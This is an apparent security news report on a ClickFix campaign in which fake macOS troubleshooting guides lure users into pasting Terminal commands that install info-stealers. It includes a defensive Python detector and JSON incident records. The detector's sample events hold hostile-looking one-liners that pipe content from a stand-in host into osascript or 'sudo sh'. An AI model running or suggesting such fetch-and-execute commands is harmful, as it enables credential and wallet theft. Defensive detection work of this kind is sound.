New ClickFix Social Engineering Campaign Targets macOS Users with Fake Troubleshooting Guides
Microsoft’s Defender Security Research Team has uncovered a sophisticated cyberattack campaign leveraging a social engineering tactic called ClickFix to compromise Apple computers. Active since late 2025 and continuing into early 2026, the campaign tricks users into executing malicious commands under the guise of legitimate troubleshooting solutions.
Attackers distribute fake guides on platforms like Medium, Craft, and Squarespace, offering fixes for common issues such as disk space errors or system malfunctions. Instead of providing downloads, these sites instruct users to copy and paste commands into macOS Terminal, claiming they are system utilities or quick repairs. The guides are often multilingual and appear on websites that have since been taken down or reported.
Once executed, the commands bypass macOS security features such as Gatekeeper, which typically scans only app bundles and disk images, not commands entered directly in Terminal. The malware, including AMOS (Atomic macOS Stealer), Macsync, and SHub Stealer, then prompts users to enter their system password under the pretense of installing a "helper tool." If the password is supplied, attackers gain full access to sensitive files, settings, and credentials.
The malware targets a range of high-value data, including:
- iCloud and Telegram account credentials
- Private documents, notes, and photos under 2 MB
- Cryptocurrency wallet keys (Exodus, Ledger, Trezor)
- Saved browser passwords (Chrome, Firefox)
- Authentic crypto apps, which attackers replace with trojanized versions to monitor transactions and steal funds
The campaign employs fileless attack techniques, using tools like curl and osascript to run malware directly in memory, evading traditional antivirus detection. Microsoft also identified a kill switch in the malware that halts execution if a Russian keyboard layout is detected.
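As an added illustration of the detection gap the article names (not code from the article or from Microsoft's research), the following detector runs over constructed process-execution events in an assumed JSON-lines format (parent process, command line, user; not any specific EDR's schema) and flags the copy-paste pattern described above: a Terminal-spawned command that fetches remote content with curl and hands it straight to an interpreter such as osascript or sh.

```python
import json
import re

# Constructed sample process-execution events in an assumed JSON-lines format
# (parent process name, command line, user): not from any real EDR product or
# from the incident the article describes.
SAMPLE_EVENTS = """
{"parent": "Terminal", "cmd": "ls -la ~/Documents", "user": "alice"}
{"parent": "Terminal", "cmd": "curl -fsSL https://fix.example.invalid/repair.txt | osascript", "user": "alice"}
{"parent": "Terminal", "cmd": "sh -c 'curl -s https://fix.example.invalid/x | sudo sh'", "user": "bob"}
{"parent": "Terminal", "cmd": "brew update", "user": "alice"}
{"parent": "launchd", "cmd": "/usr/bin/curl -s https://updates.example.invalid/m.json -o /tmp/m.json", "user": "root"}
{"parent": "Terminal", "cmd": "osascript -e 'display notification Done'", "user": "alice"}
"""

# Fetch tool output piped straight into an interpreter: the copy-paste ClickFix
# pattern. Nothing is written to disk, so Gatekeeper never gets a look at it.
FETCH_PIPED_TO_INTERPRETER = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:/usr/bin/)?"
    r"(osascript|sh|bash|zsh|python3?)\b"
)
# Parents that mean a person typed or pasted the command, as a ClickFix lure asks.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}


def classify(event):
    """Return (severity, reasons) for one event; severity is None when benign."""
    cmd, parent = event.get("cmd", ""), event.get("parent", "")
    match = FETCH_PIPED_TO_INTERPRETER.search(cmd)
    if not match:
        return None, []
    reasons = [f"remote content piped into {match.group(1)}"]
    severity = "medium"
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"launched from interactive {parent}")
        severity = "high"
    if re.search(r"\bsudo\b", cmd):
        reasons.append("runs the fetched content as root")
    return severity, reasons


def scan(jsonl):
    """Parse JSON-lines events and return one alert per ClickFix-style execution."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        severity, reasons = classify(event)
        if severity:
            alerts.append({"user": event["user"], "cmd": event["cmd"],
                           "severity": severity, "reasons": reasons})
    return alerts
```

A plain curl download to disk (the launchd event) is not flagged, since the risk the article describes is content executed without ever being written as a file.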
In response, Apple has introduced a security feature in macOS 26.4, which now displays a "Possible malware, Paste blocked" warning when users attempt to paste suspicious commands into Terminal. The update aims to mitigate the risk of unintentional execution of malicious scripts.
Source: https://hackread.com/fake-macos-troubleshooting-sites-steal-icloud-clickfix/
Squarespace TPRM report: https://www.rankiteo.com/company/squarespace
Medium TPRM report: https://www.rankiteo.com/company/medium-com
Apple TPRM report: https://www.rankiteo.com/company/apple
Craft TPRM report: https://www.rankiteo.com/company/nodecraft
{
  "id": "squnodmedapp1778279131",
  "linkid": "squarespace, nodecraft, medium-com, apple",
  "type": "Cyber Attack",
  "date": "11/2025",
  "severity": "60",
  "impact": "2",
  "explanation": "Attack limited on finance or reputation"
}
{
  "affected_entities": [
    {
      "industry": "Technology, General Public",
      "location": "Global",
      "name": "Apple macOS Users",
      "type": "Individuals, Organizations"
    }
  ],
  "attack_vector": "Fake troubleshooting guides, Terminal command execution",
  "customer_advisories": "Apple macOS users advised to update to version 26.4 and avoid executing untrusted Terminal commands",
  "data_breach": {
    "data_encryption": "No (malware bypasses encryption via direct access)",
    "data_exfiltration": "Yes",
    "file_types_exposed": ["Documents", "Photos (<2 MB)", "Browser data", "Cryptocurrency wallet files"],
    "personally_identifiable_information": "Yes (iCloud/Telegram credentials, browser passwords)",
    "sensitivity_of_data": "High",
    "type_of_data_compromised": ["Credentials", "Personal documents", "Cryptocurrency wallet keys", "Browser passwords"]
  },
  "date_detected": "2025-10-01",
  "date_publicly_disclosed": "2026-01-01",
  "description": "Microsoft’s Defender Security Research Team has uncovered a sophisticated cyberattack campaign leveraging a social engineering tactic called ClickFix to compromise Apple computers. The campaign tricks users into executing malicious commands under the guise of legitimate troubleshooting solutions, leading to malware infections such as AMOS (Atomic macOS Stealer), Macsync, and SHub Stealer.",
  "impact": {
    "brand_reputation_impact": "Potential reputational damage to Apple due to security bypass",
    "data_compromised": "iCloud and Telegram credentials, private documents, cryptocurrency wallet keys, browser passwords",
    "identity_theft_risk": "High (credentials and personal data compromised)",
    "operational_impact": "Unauthorized access to sensitive files and settings",
    "payment_information_risk": "High (cryptocurrency wallet keys and browser passwords compromised)",
    "systems_affected": "macOS systems"
  },
  "initial_access_broker": {
    "backdoors_established": "Malware persistence via trojanized crypto apps",
    "entry_point": "Fake troubleshooting guides on Medium, Craft, and Squarespace",
    "high_value_targets": ["Cryptocurrency wallet users", "iCloud/Telegram users"]
  },
  "investigation_status": "Ongoing",
  "lessons_learned": "Need for enhanced macOS security to prevent Terminal-based attacks, user education on social engineering risks, and improved detection of fileless malware.",
  "motivation": "Data theft, financial gain, credential harvesting",
  "post_incident_analysis": {
    "corrective_actions": [
      "macOS update to block suspicious Terminal paste commands",
      "Enhanced malware detection for fileless attacks",
      "User education on social engineering risks"
    ],
    "root_causes": [
      "Social engineering via fake troubleshooting guides",
      "Bypass of macOS Gatekeeper via direct Terminal input",
      "Lack of user awareness on command execution risks"
    ]
  },
  "ransomware": {
    "data_encryption": "No (malware steals data directly)",
    "data_exfiltration": "Yes"
  },
  "recommendations": [
    "Update macOS to version 26.4 or later to enable Terminal paste warnings",
    "Avoid executing commands from untrusted sources",
    "Use multi-factor authentication for sensitive accounts",
    "Monitor for unauthorized access to cryptocurrency wallets and browser data",
    "Educate users on social engineering tactics"
  ],
  "references": [{"source": "Microsoft Defender Security Research Team"}],
  "response": {
    "containment_measures": "Apple introduced a security feature in macOS 26.4 to block suspicious Terminal paste commands",
    "remediation_measures": "macOS update (26.4) with Terminal paste warnings, malware detection and removal",
    "third_party_assistance": "Microsoft Defender Security Research Team"
  },
  "title": "New ClickFix Social Engineering Campaign Targets macOS Users with Fake Troubleshooting Guides",
  "type": "Social Engineering, Malware",
  "vulnerability_exploited": "Bypass of macOS Gatekeeper via direct Terminal input"
}